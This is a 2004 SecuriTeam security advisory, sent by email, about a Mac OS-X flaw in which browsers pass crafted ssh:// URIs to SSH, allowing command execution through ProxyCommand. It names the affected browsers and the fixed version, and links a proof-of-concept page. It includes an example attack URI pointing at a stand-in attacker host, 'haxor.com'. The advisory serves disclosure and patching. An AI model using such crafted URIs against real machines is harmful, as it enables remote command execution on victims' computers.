Date: 30 May 2004 19:45:18 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [NEWS] SSH URI Handler Code Execution
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SSH URI Handler Code Execution
------------------------------------------------------------------------
SUMMARY
Using Mac OS-X's remote disk mounting and SSH's local command execution
using ProxyCommand it is possible to perform remote command execution on
the vulnerable machine.
DETAILS
Vulnerable Systems:
* Mac OS-X versions 10.3.3 and prior, with various browsers
Immune Systems:
* Mac OS-X version 10.3.4
SSH allows local command execution using the ProxyCommand option. Instead
of executing a proxy application it is easily possible to execute any
desired command. An attacker is also able to forward remote hosts using
the -R option and setting a null-password account, i.e.:
ssh://ssh haxor.com -R port:localhost:port
The problem stems from inappropriate handling of URI's. Currently,
non-trivial URIs can be very dangerous even with recent security fixes.
For example, it is still possible to use paths in URI's using URL
encoding.
Several browsers are vulnerable to the above-mentioned problem. Among them
are Safari, Camino, Firefox and Mozilla. For now it seems that Konqueror
is not vulnerable to this problem and GNOME URI handlers currently have a
bug that interferes with successful exploitation of this vulnerability.
Konqueror specifically seems to skip command line arguments, making it
immune to this issue.
A sample proof-of-concept that can be used for testing is provided
<http://www.insecure.ws/safari/0x06_test.html>; here. The HTML page will
attempt to execute a command using the above-mentioned problem (not
harmful).
Patch Availability:
In order to mitigate the vulnerability, upgrade to version 10.3.4. There
is also a simple and recommended fix at
<http://www.unsanity.com/haxies/pa/>; http://www.unsanity.com/haxies/pa/
for Mac OS-X.
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> kang.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
